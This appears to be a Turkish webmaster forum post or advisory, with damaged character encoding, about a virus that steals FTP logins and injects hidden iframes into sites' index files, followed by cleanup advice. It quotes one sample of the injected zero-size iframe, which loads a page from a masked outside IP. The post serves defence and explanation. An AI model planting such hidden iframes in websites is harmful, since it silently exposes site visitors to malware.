Son zamanlarda büyük h?zla yolunda yürüyen yeni virüs birçok webmaster?n sorunu oldu ve olmaya da devam ediyor. Bu virüs bir kere bilgisayar?n?za bula??nca o bilgisayarla hangi sitenin ftp'ini açarsan?z aç?n girdi?iniz ftp bilgilerini kaydederek, sitelere girip index.php, index.html, index.htm, default.asp 'in içlerine iframe kodu at?yor at?lan iframe kodu a?a??dakine benzer ?ekildedir.

CODE
<iframe src='http://XX.XX.XXX.XXX/logo/index.php' style='border:0px solid gray;' WIDTH=0 HEIGHT=0
FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>

Kendi kodunu sadece www/public html/ veya httpdoc/ dizinine de?il di?er bütün klasörlerin içinde bulunan index.php, index.html, index.htm, default.asp 'in içine de at?yor.

Peki, Virüs Sizin Bilgisayar?n?za Bula?t? ve bunun fark?na vard?n?z ne yapmam?z gerekir?


Sadece ftp bilgilerinizi alabildi?i için hemen dosyalar?n?z? pc'ye at?p içindeki iframe kodlar?n? silin ve tekrar ftp'den upload edin. Sonra hiç vakit kaybetmeden cpanel/plesk/directadmin panelinize girin ve ?ifrenizi de?i?tirin. Bu i?lemleri yapt?ktan sonra sak?n ftp'den giri? yapmay?n. Çünkü ftp'den giri? yapt???n?zda de?i?tirdi?iniz ?ifreyi de alarak tekrar dosyalar?n?za iframe atmaya ba?layacakt?r. Bu i?lemleri de yapt?ktan sonra bilgisayar?n?za güncel bir anti virüs ile tarama yap?n Nod32 tavsiye edilir, bu i?lem fayda etmez ise en son çare format atmakt?r.